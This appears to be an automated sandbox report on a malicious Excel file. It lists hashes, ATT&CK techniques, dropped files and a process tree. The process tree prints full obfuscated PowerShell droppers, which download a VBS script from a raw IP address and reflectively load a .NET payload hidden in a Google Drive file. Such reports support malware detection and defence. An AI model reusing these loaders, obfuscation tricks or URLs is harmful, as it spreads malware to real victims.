b0cd17647fc69ec21565ca141e88795eaf36084fb4d179198e988ab449d46483

Analysis

max time kernel
117s
max time network
121s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
07/11/2024, 03:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b0cd17647fc69ec21565ca141e88795eaf36084fb4d179198e988ab449d46483.xls
Size

645KB
MD5

a9a9c2318ac29160ece850c60e6b7aa6
SHA1

67701eb4f6813927c5262edf55d9943146f521a2
SHA256

b0cd17647fc69ec21565ca141e88795eaf36084fb4d179198e988ab449d46483
SHA512

c5db07d40516e468835e827fbf9643a442c4ebbd0c2941c97f4d00010fbe66b032be8a1fcdf568515f727810a7d7f0bf0c2707ac40a20c55616fb72c85166c1c
SSDEEP

12288:UbWNHd0zBRlrOiVNYNPPg1O+R8G7kN/eTXjWxMyPg+8FlX0iv6p:8sd4rrV6NP41ttkN2TQXbEb

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
10	2812	mshta.exe
11	2812	mshta.exe
13	2472	PoWErSHEll.EXe
15	2376	powershell.exe
17	2376	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2612	powershell.exe
2376	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2472	PoWErSHEll.EXe
2980	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	drive.google.com
15	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	PoWErSHEll.EXe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWErSHEll.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2124	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2472	PoWErSHEll.EXe
2980	powershell.exe
2472	PoWErSHEll.EXe
2472	PoWErSHEll.EXe
2612	powershell.exe
2376	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2472	PoWErSHEll.EXe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	2376	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2124	EXCEL.EXE
2124	EXCEL.EXE
2124	EXCEL.EXE
2124	EXCEL.EXE
2124	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2812 wrote to memory of 2472	2812	mshta.exe	33
PID 2812 wrote to memory of 2472	2812	mshta.exe	33
PID 2812 wrote to memory of 2472	2812	mshta.exe	33
PID 2812 wrote to memory of 2472	2812	mshta.exe	33
PID 2472 wrote to memory of 2980	2472	PoWErSHEll.EXe	35
PID 2472 wrote to memory of 2980	2472	PoWErSHEll.EXe	35
PID 2472 wrote to memory of 2980	2472	PoWErSHEll.EXe	35
PID 2472 wrote to memory of 2980	2472	PoWErSHEll.EXe	35
PID 2472 wrote to memory of 2876	2472	PoWErSHEll.EXe	36
PID 2472 wrote to memory of 2876	2472	PoWErSHEll.EXe	36
PID 2472 wrote to memory of 2876	2472	PoWErSHEll.EXe	36
PID 2472 wrote to memory of 2876	2472	PoWErSHEll.EXe	36
PID 2876 wrote to memory of 1484	2876	csc.exe	37
PID 2876 wrote to memory of 1484	2876	csc.exe	37
PID 2876 wrote to memory of 1484	2876	csc.exe	37
PID 2876 wrote to memory of 1484	2876	csc.exe	37
PID 2472 wrote to memory of 1744	2472	PoWErSHEll.EXe	38
PID 2472 wrote to memory of 1744	2472	PoWErSHEll.EXe	38
PID 2472 wrote to memory of 1744	2472	PoWErSHEll.EXe	38
PID 2472 wrote to memory of 1744	2472	PoWErSHEll.EXe	38
PID 1744 wrote to memory of 2612	1744	WScript.exe	39
PID 1744 wrote to memory of 2612	1744	WScript.exe	39
PID 1744 wrote to memory of 2612	1744	WScript.exe	39
PID 1744 wrote to memory of 2612	1744	WScript.exe	39
PID 2612 wrote to memory of 2376	2612	powershell.exe	41
PID 2612 wrote to memory of 2376	2612	powershell.exe	41
PID 2612 wrote to memory of 2376	2612	powershell.exe	41
PID 2612 wrote to memory of 2376	2612	powershell.exe	41

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\b0cd17647fc69ec21565ca141e88795eaf36084fb4d179198e988ab449d46483.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2124

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2812
- C:\Windows\SysWOW64\WinDOwsPOWeRSHEll\V1.0\PoWErSHEll.EXe
  "C:\Windows\sySTEm32\WinDOwsPOWeRSHEll\V1.0\PoWErSHEll.EXe" "pOWERSHeLl.exE -Ex ByPasS -noP -W 1 -c DEvICeCreDENtIalDePLoyMENt.EXE ; iex($(IeX('[sySTem.tEXT.enCODING]'+[ChaR]58+[ChaR]0X3A+'utf8.GEtSTrIng([SYsTeM.CONveRt]'+[Char]0X3a+[char]58+'FrOMbaSE64sTrING('+[CHaR]0x22+'JFlzRURKSE91ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUmRFZkluaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5BbnNpKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS1ZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG5vS2phdURuVEQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhmaFVXbUR6WlIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVIVyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIll2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKcFlOUHYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFlzRURKSE91OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My40LjIzLzY2L3NlZXRoZWJlc3R0aGluZ3N3aXRobWVncmVhdHdpdGhlbnRpcmVsaWZld2l0aGdvb2R0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aXRobWVncmVhdHdpdGhlbnRpcmVsaWZld2l0aGdvb2R0aC52YnMiLDAsMCk7U3RBcnQtU2xlZVAoMyk7c3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aXRobWVncmVhdHdpdGhlbnRpcmVsaWZld2l0aGdvb2R0aC52YnMi'+[cHAR]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -noP -W 1 -c DEvICeCreDENtIalDePLoyMENt.EXE
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2980
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\upncscfs.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2876
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD15.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFD14.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1484
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithmegreatwithentirelifewithgoodth.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1744
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd4WDZpbWEnKydnZVVybCA9IEYzVGh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9lJysneHBvcnQ9JysnZG93bmxvYWQmaWQnKyc9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwJysnIEYzVDt4WDZ3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZW50O3hYNmltJysnYWdlQnl0ZScrJ3MgPSB4WDZ3ZWJDbGllbnQuRG93bmxvYWREYXRhKCcrJ3hYNmltYWdlVXJsJysnKTt4WDZpbWFnZVRleHQgPSBbU3lzdCcrJ2VtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh4WDZpbWFnZScrJ0J5dGVzKTt4JysnWDZzdGFydEZsYWcgPSBGM1Q8PEJBU0U2NF9TVEFSVD4+RjNUO3hYNmVuZEZsYWcgPSBGM1Q8PEJBU0U2NF9FTkQ+PkYzVDt4WDZzdGFydEluZGV4ID0geFg2aW1hZ2VUZXgnKyd0LkluZGV4T2YoeFg2c3RhcnRGbGFnKTt4WDZlbmRJbmRleCA9IHhYNmltYWdlVGV4dC5JbmRleE9mKHhYNmVuZEZsYWcpO3hYNnN0YXJ0SW5kZXggLWdlIDAgLWFuZCB4WDZlbmRJbmRleCAtZ3QgeFg2cycrJ3RhcnRJbmRleDt4JysnWDZzdGFydEluZGV4ICs9IHhYNnN0YScrJ3J0RmxhZy5MZW5ndGg7eFg2YicrJ2FzZTY0TGVuZ3RoID0geFg2ZW5kSW5kZXggLSB4WDZzdGFydEluZGV4O3hYNmJhc2U2NENvbW0nKydhbmQgPSB4WDZpbWFnZVQnKydleHQuU3Vic3RyaW5nKHhYNnN0YXJ0SW5kZXgnKycsICcrJ3hYNmJhc2U2NExlbmd0aCk7eFg2YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoeFg2YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFluViBGb3JFYWNoLU9iamVjdCB7IHhYNl8nKycgfScrJylbLTEuLi0oeFg2YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTt4WDZjbycrJ21tYScrJ25kQnl0ZXMgPSBbU3lzJysndGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHhYNmJhc2U2NFJldmVyc2VkKTt4WDZsJysnb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWJseV06OkxvYWQoeFg2Y29tbWFuZEJ5dGVzKTt4JysnWDZ2YWlNZScrJ3Rob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TScrJ2V0aG9kKEYnKyczVFZBSUYzVCk7eFg2dmFpTWV0aG9kLkludm9rZSh4WDZudWxsLCBAKEYzVHR4dC5MRVNTQUMvJysnNjYvMzIuNC4zNzEuNzAxLy86cHR0aEYzVCwgRjNUZGVzYXRpJysndmFkb0YzVCwgRjNUZGVzYXRpdmFkb0YzVCwgRjNUZGVzYXRpdmFkb0YzVCwgRjNUYXNwbmV0X2NvbXBpbGVyRjNULCBGM1RkZXNhdGl2YWRvRjNULCBGM1RkZXNhdGl2YWRvJysnRjNULEYzVGRlc2F0aXZhZG9GM1QsRjNUZGVzYScrJ3RpdmFkb0YzVCxGM1RkZXNhdGl2YWRvRjNULEYzVCcrJ2Rlc2F0aXZhZG9GM1QsRjNUZGVzYXRpdmFkb0YzVCxGM1QxRjNULEYzVGRlc2F0aXZhZG9GM1QpKTsnKS5yRXBMQWNlKChbQ2hBUl0xMjArW0NoQVJdODgrW0NoQVJdNTQpLFtTVHJpTmddW0NoQVJdMzYpLnJFcExBY2UoJ1luVicsW1NUcmlOZ11bQ2hBUl0xMjQpLnJFcExBY2UoJ0YzVCcsW1NUcmlOZ11bQ2hBUl0zOSkgfCYgKCAkU2hFTExJZFsxXSskc2hlbGxpRFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2612
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('xX6ima'+'geUrl = F3Thttps://drive.google.com/uc?e'+'xport='+'download&id'+'=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0'+' F3T;xX6webClient = New-Object System.Net.'+'WebClient;xX6im'+'ageByte'+'s = xX6webClient.DownloadData('+'xX6imageUrl'+');xX6imageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(xX6image'+'Bytes);x'+'X6startFlag = F3T<<BASE64_START>>F3T;xX6endFlag = F3T<<BASE64_END>>F3T;xX6startIndex = xX6imageTex'+'t.IndexOf(xX6startFlag);xX6endIndex = xX6imageText.IndexOf(xX6endFlag);xX6startIndex -ge 0 -and xX6endIndex -gt xX6s'+'tartIndex;x'+'X6startIndex += xX6sta'+'rtFlag.Length;xX6b'+'ase64Length = xX6endIndex - xX6startIndex;xX6base64Comm'+'and = xX6imageT'+'ext.Substring(xX6startIndex'+', '+'xX6base64Length);xX6base64Reversed = -join (xX6base64Command.ToCharArray() YnV ForEach-Object { xX6_'+' }'+')[-1..-(xX6base64Command.Length)];xX6co'+'mma'+'ndBytes = [Sys'+'tem.Convert]::FromBase64String(xX6base64Reversed);xX6l'+'oadedAssembly = [System.Refl'+'ection.Assembly]::Load(xX6commandBytes);x'+'X6vaiMe'+'thod = [dnlib.IO.Home].GetM'+'ethod(F'+'3TVAIF3T);xX6vaiMethod.Invoke(xX6null, @(F3Ttxt.LESSAC/'+'66/32.4.371.701//:ptthF3T, F3Tdesati'+'vadoF3T, F3TdesativadoF3T, F3TdesativadoF3T, F3Taspnet_compilerF3T, F3TdesativadoF3T, F3Tdesativado'+'F3T,F3TdesativadoF3T,F3Tdesa'+'tivadoF3T,F3TdesativadoF3T,F3T'+'desativadoF3T,F3TdesativadoF3T,F3T1F3T,F3TdesativadoF3T));').rEpLAce(([ChAR]120+[ChAR]88+[ChAR]54),[STriNg][ChAR]36).rEpLAce('YnV',[STriNg][ChAR]124).rEpLAce('F3T',[STriNg][ChAR]39) |& ( $ShELLId[1]+$shelliD[13]+'x')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2376

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
be90c9cbc88cdbe83e6595aa523c8839

SHA1
7cfb3e46baef5b43c3e65d6b1b95661d18aafd70

SHA256
15324a090518f3321f752e240ca4a50a4674e40f1c6a341b5c037d0274cca8f9

SHA512
90986f5f072652a526b82a52f908e9150a8627bf3e00c91abe806ef92f1fbab8abb3895cd9a5816304a7b2daaadad4297d2836629bae752e0837723d9004d1d3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d45554a99d8d09eb05c6d7ac5941cbc2

SHA1
4c95ac1d7469d3e97f0fb6f2339b570159e5e5d0

SHA256
cacc9ef76d157e5dfef0e45403720a2b50676f52da2253c4015377ae191e3e81

SHA512
87a77637eb06dd86207ee2deeccd89f9a4f6fe410b148a57bd523459b5255aee885a1c13ee075d258052817269590d0817bc4ff92fd5e607ad269afc5580efcf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
9433a27f72bd555709072688207e3740

SHA1
6b7e3b181860d0103d36ee218d4539566fd6c6ce

SHA256
d2975f92ff86b1128b3f57573c8d71378808233656f4afa48b09f60b7a062990

SHA512
e9b0a341ed780803ced1446f1ce1ceb67063ee8a93de363cfba51b78da9fa4b6d197281489660c14c039ec46876bc716c9855e94c21b42125e7156da4b0de695

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5GWW47WY\createdbestthingswithentirelifewithgoodfeaturesareonhere[1].hta

Filesize
8KB

MD5
1d89b649a7d2ef26d72b4f11633a9017

SHA1
d48edb474f7594dff6ed36a10a1825b5d9e111d7

SHA256
de7a97009148d8c2937d5c322973fb8c35406bb94d898abd88cbff4cf0d2b237

SHA512
6f0ec1654fe2b88e7973b5f992933aa1cd88092fa0379efb7da709a22280615d4761a49476c7c36d06167a06949be1c3753d4dbc206f098a218bad92262cfe1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF1CE.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESFD15.tmp

Filesize
1KB

MD5
6b57ea6f4aa45f182a12478ef7154269

SHA1
cf86ac77184775fdac0ee3ad89ee2be953068421

SHA256
1b0af58724a22cf8ead87a46900bc51ab27af0151b1f362f6dd028f4dc05196b

SHA512
dd3e89c4c42211b1f1b4bcfa69dab4c247b90c4faf7219f548825ba9f6fbd476073b3198d98a70da954fba0ba1af87f8831b62f014ae408d3a52a0e827f11c00

Download Submit
C:\Users\Admin\AppData\Local\Temp\upncscfs.dll

Filesize
3KB

MD5
559650a52dbc3cd5c1424a1f5f90005a

SHA1
8d9f3b924aeba3b88ae1c33b0924cd9ca29061b2

SHA256
1c987ec96dd4f6b55a238d27c2fdbcb83475d6d4c48b057c84eeeea04e78296a

SHA512
fc634b0843906a95e7cc5e635721fb335ede3ea9b0f5bcad93ddfbfcc4e83e9cc8e6a2eb75d9b40b8f50612785ac5c6b592c3ee27b51cc93ca15efe8313d297c

Download Submit
C:\Users\Admin\AppData\Local\Temp\upncscfs.pdb

Filesize
7KB

MD5
f7bc74cfab90a180433fc0009343cea5

SHA1
06d910712edfc7a5480d55d8937d566dee2daaa1

SHA256
2830ac4d04d035dcf6d427f3d3e4d0d7e90aef5065aa856c491dac9be50a8f42

SHA512
a0e1328e08cd3b6857b1de953417bb256d65524e30b2be1d5d052390f24da60aeb66b8b07911690863648a7f9d76cae69361ecf85051f8b89fa3e1d2ed67350e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
2ac2c919135c59b9dd1d1b42bcdfc1ba

SHA1
4257947338f1746056f5d447f54907eb4dfb9257

SHA256
a2ac021344729e53c780797828917cdef7a78761245e930d287cb776c35ecf16

SHA512
85fbcbff46aaed77313861b6fe75ff913b22a38e48ee0a40fc45192130ddb9d505545fafe0eea44e7d1868eb15519c18561bc0405eb186ce850a8a90f52d26f2

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingswithmegreatwithentirelifewithgoodth.vbs

Filesize
138KB

MD5
4bbb30fded9fd12bffb37261d39e8139

SHA1
31b47da89bcba90315661300076b567f6682f33b

SHA256
2ba56dfa938b61c01b9c3db3ff37f975af3cd3a883aae027feb6d59537d0f72e

SHA512
e8a5e561bbd94b9439d11b7d2e161c036610754fbca5dafbbee830ae8703714d1e7b86da1e257e485cdf942651991452516561e9ed242f61b93729e623cb7b92

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCFD14.tmp

Filesize
652B

MD5
efcfcde5e234b84d1152029ce9af1399

SHA1
5bb66291744642971c104ce6a25b28ce51e36040

SHA256
85363d82de08f1406f9ceee314c1081565edf169ea903e34f3805f65ca3fd7ec

SHA512
fb4764b710f019af237f4a17f4de79e6824dd99423fe4be1efc978f3f037f0248b8620b9af0228e36926d0a5b5616fef109cfdbc55f28e4b7d4ebf239c4f5327

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\upncscfs.0.cs

Filesize
467B

MD5
20f1899a90d8d923e72108e6375f7f61

SHA1
a4208600d31f73bbd9698c7c8136415a1462f2f5

SHA256
8a577d1ab0482d3828f19fceffb2f1bab9b17aa96f8673e6ba0892eb36330ed4

SHA512
7c70f145982ba48be956c1aa11b0a638bd8a8f0cf1e5d41f117943efcff94281f00519f0dff67d8e30857765ef1404160b0cc9105bd7f76c6ce81722e507ebc1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\upncscfs.cmdline

Filesize
309B

MD5
00dd57dc00dd1f9bd1580a48c6dc846c

SHA1
176cccc0602435a08eb29a8dbab76de14490c5c8

SHA256
7d5dfc158413487ef0fb6cf4d218ca82fde4f642af0daa0e0bb0ebd9caf31a56

SHA512
e1d73e76acfbcb6bfb4ae39b565b02908c08af276cb691d346abfaa7ca71c0119e74e7c77c5e0bdc4213f4c68793a3ec9c2bd01a32663eaacf79378914addfb0

Download Submit
memory/2124-1-0x000000007254D000-0x0000000072558000-memory.dmp

Filesize
44KB

Download
memory/2124-19-0x0000000002D60000-0x0000000002D62000-memory.dmp

Filesize
8KB

Download
memory/2124-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2124-77-0x000000007254D000-0x0000000072558000-memory.dmp

Filesize
44KB

Download
memory/2812-18-0x0000000002A20000-0x0000000002A22000-memory.dmp

Filesize
8KB

Download